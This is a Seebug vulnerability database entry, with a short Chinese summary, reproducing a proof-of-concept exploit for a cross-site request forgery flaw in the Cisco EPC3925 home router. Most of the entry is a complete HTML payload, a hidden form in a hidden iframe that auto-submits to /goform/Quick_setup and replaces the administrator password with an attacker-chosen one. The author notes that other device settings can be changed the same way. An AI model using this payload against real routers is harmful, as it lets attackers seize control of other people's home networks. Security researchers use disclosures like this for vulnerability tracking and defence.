Cisco EPC3925 - Cross Site Request Forgery

2014-07-01T00:00:00
ID SSV:83763
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

<p>Cisco EPC3925是美国思科(Cisco)公司的一款家用无线路由器设备。 Cisco EPC3925路由器中存在跨站请求伪造漏洞,该漏洞源于goform/Quick_setup URL没有正确验证请求。远程攻击者可借助Password和PasswordReEnter参数利用该漏洞更改密码。</p>

                                        
                                            
                                                #######################################################################
# Exploit Title: Cisco EPC3925 ? Cross Site Request Forgery
# Google Dork: N/A
# Date: 12-11-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.cisco.com 
# Software Link: Not public
# Version: epc3925-E10-5-v302r125572-130520c
# Tested on: Cisco EPC3925 
# CVE: N/A
#######################################################################
# Description:
# 
# This proof of concept demonstrates that the admin password can be 
# changed by an attacker in a CSRF attack. However, it seems like any
# setting in the device can be manipulated using an attack like this.
#
#
# Side note: The device does not ask for the current password.
#            
#
# Location:
#
# POST http://[target]/goform/Quick_setup
#
# Parameters:
#
# Password=&PasswordReEnter=&save=Save+Settings
#
# PoC: 
#
# &#60;html&#62;
#
# &#60;form name=&#34;reseller&#34; method=&#34;POST&#34;
action=&#34;http://[target]/goform/Quick_setup&#34; id=&#34;csrf_attack&#34;
target=&#34;csrf_iframe&#34;&#62;
#   &#60;input type=&#34;hidden&#34; name=&#34;Password&#34; value=&#34;attackers_password&#34;&#62;
#   &#60;input type=&#34;hidden&#34; name=&#34;PasswordReEnter&#34; value=&#34;attackers_password&#34;&#62;
#   &#60;input type=&#34;hidden&#34; name=&#34;save&#34; value=&#34;Save Settings&#34;&#62;
# &#60;/form&#62;
#
# &#60;iframe id=&#34;csrf_iframe&#34; style=&#34;visibility:hidden;display:none&#34;&#62;&#60;/iframe&#62;
#
# &#60;script&#62;
#  document.getElementById(&#39;csrf_attack&#39;).submit();
# &#60;/script&#62;
# &#60;center&#62;The payload has been executed....&#60;/center&#62;
#
# &#60;/html&#62; 
#
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/